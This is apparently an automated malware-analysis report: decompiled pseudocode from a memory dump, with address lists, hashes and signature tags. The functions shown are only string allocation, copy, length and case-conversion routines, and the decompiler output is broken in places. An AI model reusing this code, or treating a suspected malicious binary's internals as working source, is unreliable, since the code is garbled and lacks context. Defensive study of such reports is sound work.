									_t109 = _v32;
									while(1) {
										_t109 = _t109 + 1;
										_t117 =  *(_t99 + _t109 * 4 - 2) & 0x0000ffff;
										 *(_t62 + _t109 * 4 - 2) = _t117;
										if(_t117 == 0) {
											break;
										}
										_t118 =  *(_t99 + _t109 * 4) & 0x0000ffff;
										 *(_t62 + _t109 * 4) = _t118;
										if(_t118 != 0) {
											continue;
										}
										break;
									}
									_t112 = _v36;
								}
							}
							_push(2);
							_push(_t99);
							_v36 = _t62;
							E003B10B0();
							_t106 = _a4;
							_t62 = _v36;
							_t134 = _t134 + 8;
						}
						_t106[1] = _t84;
						 *_t106 = _t62;
					} else {
						_t62 = 0;
					}
					if(_t62 != 0) {
						_t101 = 0;
						while(1) {
							_t85 =  *_t112 & 0x0000ffff;
							_t101 = _t101 + 1;
							 *_t62 = _t85;
							if(_t130 != 0 && _t101 == _t130) {
								break;
							}
							if(_t85 == 0) {
								_t62 =  *_t106;
							} else {
								_t62 =  &(_t62[1]);
								_t112 = _t112 + 2;
								continue;
							}
							goto L44;
						}
						_t62[1] = 0;
						_t62 =  *_t106;
					}
				}
				L44:
				_t74 =  *_t62 & 0x0000ffff;
				if(_t74 != 0) {
					_t92 = 0;
					while(1) {
						_t92 = _t92 + 1;
						_t47 = _t74 - 0x20; // -32
						_t76 =  <=  ? _t47 : _t74;
						_t115 =  *(_t62 + _t92 * 4 - 2) & 0x0000ffff;
						 *((short*)(_t62 + _t92 * 4 - 4)) =  <=  ? _t47 : _t74;
						if(_t115 == 0) {
							goto L48;
						}
						_t74 =  *(_t62 + _t92 * 4) & 0x0000ffff;
						_t116 =  <=  ? _t115 - 0x20 : _t115;
						 *(_t62 + _t92 * 4 - 2) =  <=  ? _t115 - 0x20 : _t115;
						if(_t74 != 0) {
							continue;
						}
						goto L48;
					}
				}
				L48:
				return _t106;
			}

0x003b9e78
0x003b9e79
0x003b9e7c
0x003b9e7f
0x003b9e83
0x003b9e85
0x003b9e8a
0x003b9ff7
0x003b9ffc
0x003ba001
0x003ba004
0x003ba007
0x003ba00b
0x003ba052
0x003ba00d
0x003ba00f
0x003ba011
0x003ba014
0x003ba019
0x003ba01b
0x003ba01d
0x003ba01d
0x003ba01e
0x003ba023
0x003ba02a
0x00000000
0x00000000
0x003ba02c
0x003ba030
0x003ba036
0x00000000
0x00000000
0x00000000
0x003ba036
0x003ba01d
0x003ba019
0x003ba038
0x003ba038
0x003ba03a
0x003ba03b
0x003ba03f
0x003ba044
0x003ba047
0x003ba04b
0x003ba04b
0x003ba055
0x003ba05c
0x003b9e9b
0x003b9e9d
0x003b9ea0
0x003b9ebd
0x003b9ec1
0x003b9ecd
0x003b9ed3
0x003b9ed3
0x003b9ed8
0x003b9edc
0x003b9ee2
0x00000000
0x00000000
0x003b9ee8
0x003b9eed
0x00000000
0x003b9eef
0x003b9ef5
0x00000000
0x00000000
0x00000000
0x00000000
0x003b9ef5
0x00000000
0x003b9eed
0x003ba0b7
0x003ba0bc
0x003b9ea2
0x003b9ea2
0x003b9ea7
0x00000000
0x003b9ef7
0x003b9eff
0x003b9f06
0x00000000
0x003b9f08
0x003b9f08
0x003b9f08
0x003b9f08
0x00000000
0x003b9f06
0x003b9ea9
0x003b9eae
0x003b9eb0
0x003b9eb0
0x003b9eb6
0x00000000
0x00000000
0x003b9eb8
0x003b9ebb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b9ebb
0x003b9eb0
0x003b9ea7
0x003b9f0d
0x003b9f12
0x003b9f18
0x003b9f1d
0x003b9f30
0x003b9f33
0x003b9f39
0x003b9f41
0x003b9f41
0x003b9f49
0x003b9f50
0x003b9f51
0x003b9f54
0x003b9f59
0x003b9f5c
0x003b9f5f
0x003b9f63
0x003b9fc0
0x003b9f65
0x003b9f67
0x003b9f69
0x003b9f6c
0x003b9f74
0x003b9f76
0x003b9f7e
0x003b9f81
0x003b9f85
0x003b9f85
0x003b9f86
0x003b9f8b
0x003b9f92
0x00000000
0x00000000
0x003b9f94
0x003b9f98
0x003b9f9e
0x00000000
0x00000000
0x00000000
0x003b9f9e
0x003b9fa0
0x003b9fa3
0x003b9f74
0x003b9fa6
0x003b9fa8
0x003b9fa9
0x003b9fad
0x003b9fb2
0x003b9fb5
0x003b9fb9
0x003b9fb9
0x003b9fc3
0x003b9fc6
0x003b9f1f
0x003b9f1f
0x003b9f1f
0x003b9fca
0x003b9fd0
0x003b9fda
0x003b9fda
0x003b9fdd
0x003b9fde
0x003b9fe3
0x00000000
0x00000000
0x003b9fef
0x003ba0b3
0x003b9ff5
0x003b9fd4
0x003b9fd7
0x00000000
0x003b9fd7
0x00000000
0x003b9fef
0x003ba0ab
0x003ba0af
0x003ba0af
0x003b9fca
0x003ba05e
0x003ba05e
0x003ba063
0x003ba065
0x003ba067
0x003ba067
0x003ba06e
0x003ba071
0x003ba074
0x003ba079
0x003ba080
0x00000000
0x00000000
0x003ba08b
0x003ba08f
0x003ba092
0x003ba099
0x00000000
0x00000000
0x00000000
0x003ba099
0x003ba067
0x003ba09b
0x003ba0a6

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d781025913a76f35b518d42bb9011f93251b6c056899b775aa9060b1c0e66a9
Instruction ID: 74397e5a319f46ffe776eb03f0e8cd33989a88bba4c82f9a0fa3e051354e5dc9
Opcode Fuzzy Hash: 0d781025913a76f35b518d42bb9011f93251b6c056899b775aa9060b1c0e66a9
Instruction Fuzzy Hash: 79615972904B1287C7269F18C4D17BBB3A5BF85768F17432EEB558BA90EB319C41C392

Uniqueness

Uniqueness Score: -1.00%

Function 003C1020, Relevance: .2, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E003C1020(signed int* __ecx, intOrPtr* _a4) {
				unsigned int _v32;
				char* _t55;
				char _t60;
				char _t61;
				char _t62;
				char* _t63;
				char* _t64;
				char _t65;
				char* _t68;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t77;
				intOrPtr* _t82;
				signed int _t83;
				char* _t87;
				char _t88;
				char _t90;
				void* _t101;
				char _t102;
				char _t104;
				char _t105;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				void* _t120;
				signed int _t121;
				signed int* _t123;

				_t123 = (_t121 & 0xfffffff0) - 0x14;
				_t82 = _a4;
				_t107 =  *__ecx;
				 *_t82 = 0;
				 *(_t82 + 4) = 0;
				if(_t107 == 0 ||  *_t107 == 0) {
					_push(0x40);
					_t55 = E003B1030();
					_t82 = _a4;
					_t68 = _t55;
					_t123 =  &(_t123[1]);
					_t87 =  *_t82;
					if(_t87 == 0) {
						 *_t68 = 0;
					} else {
						if(_t68 != 0) {
							_t60 =  *_t87;
							 *_t68 = _t60;
							if(_t60 != 0) {
								_t114 = 0;
								while(1) {
									_t114 = _t114 + 1;
									_t61 =  *((char*)(_t87 + _t114 * 2 - 1));
									 *((char*)(_t68 + _t114 * 2 - 1)) = _t61;
									if(_t61 == 0) {
										goto L40;
									}
									_t62 =  *((char*)(_t87 + _t114 * 2));
									 *((char*)(_t68 + _t114 * 2)) = _t62;
									if(_t62 != 0) {
										continue;
									}
									goto L40;
								}
							}
						}
						L40:
						_push(1);
						_push(_t87);
						E003B10B0();
						_t82 = _a4;
						_t123 =  &(_t123[2]);
					}
					 *(_t82 + 4) = 0x40;
					 *_t82 = _t68;
				} else {
					_t71 = _t107 & 0x0000000f;
					if(_t71 == 0) {
						L6:
						asm("pxor xmm0, xmm0");
						_t120 =  ~( ~_t71 + 0x0000000f & 0x0000000f) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [edi+ebx]");
							asm("pcmpeqb xmm1, xmm0");
							asm("pmovmskb edx, xmm1");
							if(0 != 0) {
								break;
							}
							_t71 = _t71 + 0x10;
							if(_t71 < _t120) {
								continue;
							} else {
								if(_t120 >= 0x7fffffff) {
									L12:
									_t120 = 0x7fffffff;
								} else {
									while( *((char*)(_t120 + _t107)) != 0) {
										_t120 = _t120 + 1;
										if(_t120 < 0x7fffffff) {
											continue;
										} else {
											goto L12;
										}
										goto L13;
									}
								}
							}
							goto L13;
						}
						asm("bsf esi, edx");
						_t120 = _t120 + _t71;
					} else {
						_t120 = 0;
						_t71 =  ~_t71 + 0x10;
						while( *((char*)(_t120 + _t107)) != 0) {
							_t120 = _t120 + 1;
							if(_t120 < _t71) {
								continue;
							} else {
								goto L6;
							}
							goto L13;
						}
					}
					L13:
					_t5 = _t120 + 1; // 0x80000000
					_t73 =  <=  ? 0x40 : _t5;
					if(_t73 > 0) {
						_v32 = (_t73 >> 5 >> 0x1a) + _t73 >> 6;
						_t74 = _t73 & 0x8000003f;
						if(_t74 < 0) {
							_t74 = (_t74 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t77 = _v32 + (0 | _t74 > 0x00000000) << 6;
						_v32 = _t77;
						_push(_t77);
						_t63 = E003B1030();
						_t82 = _a4;
						_t68 = _t63;
						_t123 =  &(_t123[1]);
						_t64 =  *_t82;
						if(_t64 == 0) {
							 *_t68 = 0;
						} else {
							if(_t68 != 0) {
								_t102 =  *_t64;
								 *_t68 = _t102;
								if(_t102 != 0) {
									 *_t123 = _t107;
									_t83 = 0;
									while(1) {
										_t83 = _t83 + 1;
										_t104 =  *((char*)(_t64 + _t83 * 2 - 1));
										 *((char*)(_t68 + _t83 * 2 - 1)) = _t104;
										if(_t104 == 0) {
											break;
										}
										_t105 =  *((char*)(_t64 + _t83 * 2));
										 *((char*)(_t68 + _t83 * 2)) = _t105;
										if(_t105 != 0) {
											continue;
										}
										break;
									}
									_t107 =  *_t123;
								}
							}
							_push(1);
							_push(_t64);
							E003B10B0();
							_t82 = _a4;
							_t123 =  &(_t123[2]);
						}
						 *(_t82 + 4) = _v32;
						 *_t82 = _t68;
					} else {
						_t68 = 0;
					}
					if(_t68 != 0) {
						_t101 = 0;
						while(1) {
							_t65 =  *_t107;
							_t101 = _t101 + 1;
							 *_t68 = _t65;
							if(_t120 != 0 && _t101 == _t120) {
								break;
							}
							if(_t65 == 0) {
								_t68 =  *_t82;
							} else {
								_t68 = _t68 + 1;
								_t107 = _t107 + 1;
								continue;
							}
							goto L43;
						}
						 *((char*)(_t68 + 1)) = 0;
						_t68 =  *_t82;
					}
				}
				L43:
				_t88 =  *_t68;
				if(_t88 != 0) {
					_t113 = 0;
					while(1) {
						_t113 = _t113 + 1;
						_t89 =  <=  ? _t88 - 0x20 : _t88;
						 *((char*)(_t68 + _t113 * 2 - 2)) =  <=  ? _t88 - 0x20 : _t88;
						_t90 =  *((char*)(_t68 + _t113 * 2 - 1));
						if(_t90 == 0) {
							goto L47;
						}
						_t91 =  <=  ? _t90 - 0x20 : _t90;
						 *((char*)(_t68 + _t113 * 2 - 1)) =  <=  ? _t90 - 0x20 : _t90;
						_t88 =  *((char*)(_t68 + _t113 * 2));
						if(_t88 != 0) {
							continue;
						}
						goto L47;
					}
				}
				L47:
				return _t82;
			}

0x003c1029
0x003c102e
0x003c1031
0x003c1035
0x003c1037
0x003c103c
0x003c1188
0x003c118a
0x003c118f
0x003c1192
0x003c1194
0x003c1197
0x003c119b
0x003c11d5
0x003c119d
0x003c119f
0x003c11a1
0x003c11a4
0x003c11a8
0x003c11aa
0x003c11ac
0x003c11ac
0x003c11ad
0x003c11b2
0x003c11b8
0x00000000
0x00000000
0x003c11ba
0x003c11be
0x003c11c3
0x00000000
0x00000000
0x00000000
0x003c11c3
0x003c11ac
0x003c11a8
0x003c11c5
0x003c11c5
0x003c11c7
0x003c11c8
0x003c11cd
0x003c11d0
0x003c11d0
0x003c11d8
0x003c11df
0x003c104b
0x003c104d
0x003c1050
0x003c1064
0x003c1068
0x003c1074
0x003c107a
0x003c107a
0x003c107f
0x003c1083
0x003c1089
0x00000000
0x00000000
0x003c108f
0x003c1094
0x00000000
0x003c1096
0x003c109c
0x003c10ad
0x003c10ad
0x00000000
0x003c109e
0x003c10a4
0x003c10ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c10ab
0x003c109e
0x003c109c
0x00000000
0x003c1094
0x003c1236
0x003c1239
0x003c1052
0x003c1054
0x003c1056
0x003c1059
0x003c105f
0x003c1062
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c1062
0x003c1059
0x003c10b2
0x003c10b7
0x003c10bd
0x003c10c2
0x003c10d8
0x003c10dc
0x003c10e2
0x003c10ea
0x003c10ea
0x003c10f8
0x003c10fb
0x003c10ff
0x003c1100
0x003c1105
0x003c1108
0x003c110a
0x003c110d
0x003c1111
0x003c1156
0x003c1113
0x003c1115
0x003c1117
0x003c111a
0x003c111e
0x003c1122
0x003c1125
0x003c1127
0x003c1127
0x003c1128
0x003c112d
0x003c1133
0x00000000
0x00000000
0x003c1135
0x003c1139
0x003c113e
0x00000000
0x00000000
0x00000000
0x003c113e
0x003c1140
0x003c1143
0x003c111e
0x003c1146
0x003c1148
0x003c1149
0x003c114e
0x003c1151
0x003c1151
0x003c115d
0x003c1160
0x003c10c4
0x003c10c4
0x003c10c4
0x003c1164
0x003c1166
0x003c116c
0x003c116c
0x003c116f
0x003c1170
0x003c1174
0x00000000
0x00000000
0x003c1180
0x003c1232
0x003c1186
0x003c116a
0x003c116b
0x00000000
0x003c116b
0x00000000
0x003c1180
0x003c122a
0x003c122e
0x003c122e
0x003c1164
0x003c11e1
0x003c11e1
0x003c11e6
0x003c11e8
0x003c11ea
0x003c11ea
0x003c11f4
0x003c11f7
0x003c11fb
0x003c1202
0x00000000
0x00000000
0x003c120d
0x003c1210
0x003c1214
0x003c121a
0x00000000
0x00000000
0x00000000
0x003c121a
0x003c11ea
0x003c121c
0x003c1227

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae64409f2d16467f71373ee2bf306acfd33e073002edd05b5c76f8db5368782a
Instruction ID: 4699fabe53783ab55c23269202aaaacc8d6194801f19a2d89700e86cd982d567
Opcode Fuzzy Hash: ae64409f2d16467f71373ee2bf306acfd33e073002edd05b5c76f8db5368782a
Instruction Fuzzy Hash: 0961292560879257D7238E6988D0B2B7BA66F97304F1DC2ACCD518F28BDA768C42D3C1

Uniqueness

Uniqueness Score: -1.00%

Function 003C1240, Relevance: .2, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E003C1240(signed int* __ecx, intOrPtr* _a4) {
				unsigned int _v32;
				char* _t55;
				char _t60;
				char _t61;
				char _t62;
				char* _t63;
				char* _t64;
				char _t65;
				char* _t68;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t77;
				intOrPtr* _t82;
				signed int _t83;
				char* _t87;
				char _t88;
				char _t90;
				void* _t101;
				char _t102;
				char _t104;
				char _t105;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				void* _t120;
				signed int _t121;
				signed int* _t123;

				_t123 = (_t121 & 0xfffffff0) - 0x14;
				_t82 = _a4;
				_t107 =  *__ecx;
				 *_t82 = 0;
				 *(_t82 + 4) = 0;
				if(_t107 == 0 ||  *_t107 == 0) {
					_push(0x40);
					_t55 = E003B1030();
					_t82 = _a4;
					_t68 = _t55;
					_t123 =  &(_t123[1]);
					_t87 =  *_t82;
					if(_t87 == 0) {
						 *_t68 = 0;
					} else {
						if(_t68 != 0) {
							_t60 =  *_t87;
							 *_t68 = _t60;
							if(_t60 != 0) {
								_t114 = 0;
								while(1) {
									_t114 = _t114 + 1;
									_t61 =  *((char*)(_t87 + _t114 * 2 - 1));
									 *((char*)(_t68 + _t114 * 2 - 1)) = _t61;
									if(_t61 == 0) {
										goto L40;
									}
									_t62 =  *((char*)(_t87 + _t114 * 2));
									 *((char*)(_t68 + _t114 * 2)) = _t62;
									if(_t62 != 0) {
										continue;
									}
									goto L40;
								}
							}
						}
						L40:
						_push(1);
						_push(_t87);
						E003B10B0();
						_t82 = _a4;
						_t123 =  &(_t123[2]);
					}
					 *(_t82 + 4) = 0x40;
					 *_t82 = _t68;
				} else {
					_t71 = _t107 & 0x0000000f;
					if(_t71 == 0) {
						L6:
						asm("pxor xmm0, xmm0");
						_t120 =  ~( ~_t71 + 0x0000000f & 0x0000000f) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [edi+ebx]");
							asm("pcmpeqb xmm1, xmm0");
							asm("pmovmskb edx, xmm1");
							if(0 != 0) {
								break;
							}
							_t71 = _t71 + 0x10;
							if(_t71 < _t120) {
								continue;
							} else {
								if(_t120 >= 0x7fffffff) {
									L12:
									_t120 = 0x7fffffff;
								} else {
									while( *((char*)(_t120 + _t107)) != 0) {
										_t120 = _t120 + 1;
										if(_t120 < 0x7fffffff) {
											continue;
										} else {
											goto L12;
										}
										goto L13;
									}
								}
							}
							goto L13;
						}
						asm("bsf esi, edx");
						_t120 = _t120 + _t71;
					} else {
						_t120 = 0;
						_t71 =  ~_t71 + 0x10;
						while( *((char*)(_t120 + _t107)) != 0) {
							_t120 = _t120 + 1;
							if(_t120 < _t71) {
								continue;
							} else {
								goto L6;
							}
							goto L13;
						}
					}
					L13:
					_t5 = _t120 + 1; // 0x80000000
					_t73 =  <=  ? 0x40 : _t5;
					if(_t73 > 0) {
						_v32 = (_t73 >> 5 >> 0x1a) + _t73 >> 6;
						_t74 = _t73 & 0x8000003f;
						if(_t74 < 0) {
							_t74 = (_t74 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t77 = _v32 + (0 | _t74 > 0x00000000) << 6;
						_v32 = _t77;
						_push(_t77);
						_t63 = E003B1030();
						_t82 = _a4;
						_t68 = _t63;
						_t123 =  &(_t123[1]);
						_t64 =  *_t82;
						if(_t64 == 0) {
							 *_t68 = 0;
						} else {
							if(_t68 != 0) {
								_t102 =  *_t64;
								 *_t68 = _t102;
								if(_t102 != 0) {
									 *_t123 = _t107;
									_t83 = 0;
									while(1) {
										_t83 = _t83 + 1;
										_t104 =  *((char*)(_t64 + _t83 * 2 - 1));
										 *((char*)(_t68 + _t83 * 2 - 1)) = _t104;
										if(_t104 == 0) {
											break;
										}
										_t105 =  *((char*)(_t64 + _t83 * 2));
										 *((char*)(_t68 + _t83 * 2)) = _t105;
										if(_t105 != 0) {
											continue;
										}
										break;
									}
									_t107 =  *_t123;
								}
							}
							_push(1);
							_push(_t64);
							E003B10B0();
							_t82 = _a4;
							_t123 =  &(_t123[2]);
						}
						 *(_t82 + 4) = _v32;
						 *_t82 = _t68;
					} else {
						_t68 = 0;
					}
					if(_t68 != 0) {
						_t101 = 0;
						while(1) {
							_t65 =  *_t107;
							_t101 = _t101 + 1;
							 *_t68 = _t65;
							if(_t120 != 0 && _t101 == _t120) {
								break;
							}
							if(_t65 == 0) {
								_t68 =  *_t82;
							} else {
								_t68 = _t68 + 1;
								_t107 = _t107 + 1;
								continue;
							}
							goto L43;
						}
						 *((char*)(_t68 + 1)) = 0;
						_t68 =  *_t82;
					}
				}
				L43:
				_t88 =  *_t68;
				if(_t88 != 0) {
					_t113 = 0;
					while(1) {
						_t113 = _t113 + 1;
						_t89 =  <=  ? _t88 + 0x20 : _t88;
						 *((char*)(_t68 + _t113 * 2 - 2)) =  <=  ? _t88 + 0x20 : _t88;
						_t90 =  *((char*)(_t68 + _t113 * 2 - 1));
						if(_t90 == 0) {
							goto L47;
						}
						_t91 =  <=  ? _t90 + 0x20 : _t90;
						 *((char*)(_t68 + _t113 * 2 - 1)) =  <=  ? _t90 + 0x20 : _t90;
						_t88 =  *((char*)(_t68 + _t113 * 2));
						if(_t88 != 0) {
							continue;
						}
						goto L47;
					}
				}
				L47:
				return _t82;
			}

0x003c1249
0x003c124e
0x003c1251
0x003c1255
0x003c1257
0x003c125c
0x003c13a8
0x003c13aa
0x003c13af
0x003c13b2
0x003c13b4
0x003c13b7
0x003c13bb
0x003c13f5
0x003c13bd
0x003c13bf
0x003c13c1
0x003c13c4
0x003c13c8
0x003c13ca
0x003c13cc
0x003c13cc
0x003c13cd
0x003c13d2
0x003c13d8
0x00000000
0x00000000
0x003c13da
0x003c13de
0x003c13e3
0x00000000
0x00000000
0x00000000
0x003c13e3
0x003c13cc
0x003c13c8
0x003c13e5
0x003c13e5
0x003c13e7
0x003c13e8
0x003c13ed
0x003c13f0
0x003c13f0
0x003c13f8
0x003c13ff
0x003c126b
0x003c126d
0x003c1270
0x003c1284
0x003c1288
0x003c1294
0x003c129a
0x003c129a
0x003c129f
0x003c12a3
0x003c12a9
0x00000000
0x00000000
0x003c12af
0x003c12b4
0x00000000
0x003c12b6
0x003c12bc
0x003c12cd
0x003c12cd
0x00000000
0x003c12be
0x003c12c4
0x003c12cb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c12cb
0x003c12be
0x003c12bc
0x00000000
0x003c12b4
0x003c1456
0x003c1459
0x003c1272
0x003c1274
0x003c1276
0x003c1279
0x003c127f
0x003c1282
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c1282
0x003c1279
0x003c12d2
0x003c12d7
0x003c12dd
0x003c12e2
0x003c12f8
0x003c12fc
0x003c1302
0x003c130a
0x003c130a
0x003c1318
0x003c131b
0x003c131f
0x003c1320
0x003c1325
0x003c1328
0x003c132a
0x003c132d
0x003c1331
0x003c1376
0x003c1333
0x003c1335
0x003c1337
0x003c133a
0x003c133e
0x003c1342
0x003c1345
0x003c1347
0x003c1347
0x003c1348
0x003c134d
0x003c1353
0x00000000
0x00000000
0x003c1355
0x003c1359
0x003c135e
0x00000000
0x00000000
0x00000000
0x003c135e
0x003c1360
0x003c1363
0x003c133e
0x003c1366
0x003c1368
0x003c1369
0x003c136e
0x003c1371
0x003c1371
0x003c137d
0x003c1380
0x003c12e4
0x003c12e4
0x003c12e4
0x003c1384
0x003c1386
0x003c138c
0x003c138c
0x003c138f
0x003c1390
0x003c1394
0x00000000
0x00000000
0x003c13a0
0x003c1452
0x003c13a6
0x003c138a
0x003c138b
0x00000000
0x003c138b
0x00000000
0x003c13a0
0x003c144a
0x003c144e
0x003c144e
0x003c1384
0x003c1401
0x003c1401
0x003c1406
0x003c1408
0x003c140a
0x003c140a
0x003c1414
0x003c1417
0x003c141b
0x003c1422
0x00000000
0x00000000
0x003c142d
0x003c1430
0x003c1434
0x003c143a
0x00000000
0x00000000
0x00000000
0x003c143a
0x003c140a
0x003c143c
0x003c1447

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099fc12331ff022561492b18087020d9d8d5b8bf08d513a05c8e731bfd20c05d
Instruction ID: f4e2487a20e00837b102301fd14a08c42d8b97d5e4302e8a6a7fb6f97def329a
Opcode Fuzzy Hash: 099fc12331ff022561492b18087020d9d8d5b8bf08d513a05c8e731bfd20c05d
Instruction Fuzzy Hash: 65613C3960879187D7278A6988C0B2A7AA66FD7304F59C2ADCC518F687DA72CC02D3C1

Uniqueness

Uniqueness Score: -1.00%

Function 003B8CC0, Relevance: .2, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E003B8CC0(signed short** __ecx, signed int _a4) {
				signed int _v32;
				signed int* _v36;
				signed int _t40;
				signed int _t45;
				signed int _t46;
				signed int* _t47;
				signed short* _t53;
				signed int _t59;
				short* _t62;
				signed int _t63;
				signed int _t64;
				unsigned int _t69;
				signed int _t70;
				signed short* _t72;
				signed int _t73;
				signed short* _t74;
				signed int _t79;
				void* _t87;
				signed int _t89;
				signed int _t90;
				signed short** _t96;
				signed int _t98;
				signed int _t99;
				signed int _t101;
				signed int _t103;
				signed int _t104;
				signed int _t105;
				void* _t107;

				_t107 = (_t105 & 0xfffffff0) - 0x14;
				_t96 = __ecx;
				_t101 = _a4;
				_t62 =  *((intOrPtr*)(__ecx));
				if(_t62 != _t101) {
					if(_t101 == 0 || ( *_t101 & 0x0000ffff) == 0) {
						if(_t62 != 0) {
							 *_t62 = 0;
						}
						if(_t96[1] < 0x40) {
							_push(0x80);
							_t53 = E003B1030();
							_t107 = _t107 + 4;
							_t74 =  *_t96;
							if(_t74 == 0) {
								 *_t53 = 0;
							} else {
								if(_t53 != 0) {
									_t63 =  *_t74 & 0x0000ffff;
									 *_t53 = _t63;
									if(_t63 != 0) {
										_t64 = 0;
										while(1) {
											_t64 = _t64 + 1;
											_t103 =  *(_t74 + _t64 * 4 - 2) & 0x0000ffff;
											 *(_t53 + _t64 * 4 - 2) = _t103;
											if(_t103 == 0) {
												goto L45;
											}
											_t104 =  *(_t74 + _t64 * 4) & 0x0000ffff;
											 *(_t53 + _t64 * 4) = _t104;
											if(_t104 != 0) {
												continue;
											}
											goto L45;
										}
									}
								}
								L45:
								_push(2);
								_push(_t74);
								E003B10B0();
								_t107 = _t107 + 8;
							}
							_t96[1] = 0x40;
							 *_t96 = _t53;
						}
					} else {
						_t79 = _t101 & 0x0000000f;
						if(_t79 == 0) {
							L8:
							asm("pxor xmm0, xmm0");
							_t59 =  ~( ~_t79 + 0x00000007 & 0x00000007) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [esi+edx*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								if(_t40 != 0) {
									break;
								}
								_t79 = _t79 + 8;
								if(_t79 < _t59) {
									continue;
								} else {
									if(_t59 >= 0x7fffffff) {
										goto L14;
									} else {
										goto L12;
									}
								}
								goto L15;
							}
							asm("bsf ebx, eax");
							_t59 = (_t59 >> 1) + _t79;
							goto L49;
						} else {
							_t59 = 0;
							if((_t79 & 0x00000001) != 0) {
								L12:
								while(( *(_t101 + _t59 * 2) & 0x0000ffff) != 0) {
									_t59 = _t59 + 1;
									if(_t59 < 0x7fffffff) {
										continue;
									} else {
										L14:
										_t59 = 0x7fffffff;
									}
									goto L15;
								}
								goto L49;
							} else {
								_t79 =  ~_t79 + 0x10 >> 1;
								while(1) {
									_t40 =  *(_t101 + _t59 * 2) & 0x0000ffff;
									if(_t40 == 0) {
										break;
									}
									_t59 = _t59 + 1;
									if(_t59 < _t79) {
										continue;
									} else {
										goto L8;
									}
									goto L15;
								}
								L49:
								if(_t59 == 0xffffffff && _t62 != 0) {
									 *_t62 = 0;
								}
							}
						}
						L15:
						_t8 = _t59 + 1; // -2147483653
						_t45 =  <=  ? 0x40 : _t8;
						if(_t45 > _t96[1]) {
							_t69 = (_t45 >> 5 >> 0x1a) + _t45 >> 6;
							_t46 = _t45 & 0x8000003f;
							if(_t46 < 0) {
								_t46 = (_t46 - 0x00000001 | 0xffffffc0) + 1;
							}
							_t70 = _t69 + (0 | _t46 > 0x00000000);
							_v32 = _t70 << 6;
							_push(_t70 << 7);
							_t47 = E003B1030();
							_t107 = _t107 + 4;
							_t72 =  *_t96;
							if(_t72 == 0) {
								 *_t47 = 0;
							} else {
								if(_t47 != 0) {
									_t89 =  *_t72 & 0x0000ffff;
									 *_t47 = _t89;
									if(_t89 != 0) {
										_v36 = _t96;
										_t90 = 0;
										while(1) {
											_t90 = _t90 + 1;
											_t98 =  *(_t72 + _t90 * 4 - 2) & 0x0000ffff;
											 *(_t47 + _t90 * 4 - 2) = _t98;
											if(_t98 == 0) {
												break;
											}
											_t99 =  *(_t72 + _t90 * 4) & 0x0000ffff;
											_t47[_t90] = _t99;
											if(_t99 != 0) {
												continue;
											}
											break;
										}
										_t96 = _v36;
									}
								}
								_push(2);
								_push(_t72);
								_v36 = _t47;
								E003B10B0();
								_t47 = _v36;
								_t107 = _t107 + 8;
							}
							_t96[1] = _v32;
							 *_t96 = _t47;
						} else {
							_t47 =  *_t96;
						}
						if(_t47 != 0) {
							_t87 = 0;
							while(1) {
								_t73 =  *_t101 & 0x0000ffff;
								_t87 = _t87 + 1;
								 *_t47 = _t73;
								if(_t59 != 0 && _t87 == _t59) {
									break;
								}
								if(_t73 != 0) {
									_t47 =  &(_t47[0]);
									_t101 = _t101 + 2;
									continue;
								}
								goto L48;
							}
							_t47[0] = 0;
						}
					}
				}
				L48:
				return _t96;
			}

0x003b8cc9
0x003b8ccc
0x003b8cce
0x003b8cd1
0x003b8cd5
0x003b8cdd
0x003b8e42
0x003b8e46
0x003b8e46
0x003b8e4d
0x003b8e4f
0x003b8e59
0x003b8e5b
0x003b8e5e
0x003b8e62
0x003b8e9e
0x003b8e64
0x003b8e66
0x003b8e68
0x003b8e6b
0x003b8e70
0x003b8e72
0x003b8e74
0x003b8e74
0x003b8e75
0x003b8e7a
0x003b8e81
0x00000000
0x00000000
0x003b8e83
0x003b8e87
0x003b8e8d
0x00000000
0x00000000
0x00000000
0x003b8e8d
0x003b8e74
0x003b8e70
0x003b8e8f
0x003b8e8f
0x003b8e91
0x003b8e92
0x003b8e97
0x003b8e97
0x003b8ea1
0x003b8ea8
0x003b8ea8
0x003b8cee
0x003b8cf0
0x003b8cf3
0x003b8d14
0x003b8d18
0x003b8d24
0x003b8d2a
0x003b8d2a
0x003b8d2f
0x003b8d33
0x003b8d39
0x00000000
0x00000000
0x003b8d3f
0x003b8d44
0x00000000
0x003b8d46
0x003b8d4c
0x00000000
0x00000000
0x00000000
0x00000000
0x003b8d4c
0x00000000
0x003b8d44
0x003b8edb
0x003b8ee0
0x00000000
0x003b8cf5
0x003b8cf5
0x003b8cfa
0x00000000
0x003b8d4e
0x003b8d5a
0x003b8d61
0x00000000
0x003b8d63
0x003b8d63
0x003b8d63
0x003b8d63
0x00000000
0x003b8d61
0x00000000
0x003b8cfc
0x003b8d01
0x003b8d03
0x003b8d03
0x003b8d09
0x00000000
0x00000000
0x003b8d0f
0x003b8d12
0x00000000
0x00000000
0x00000000
0x00000000
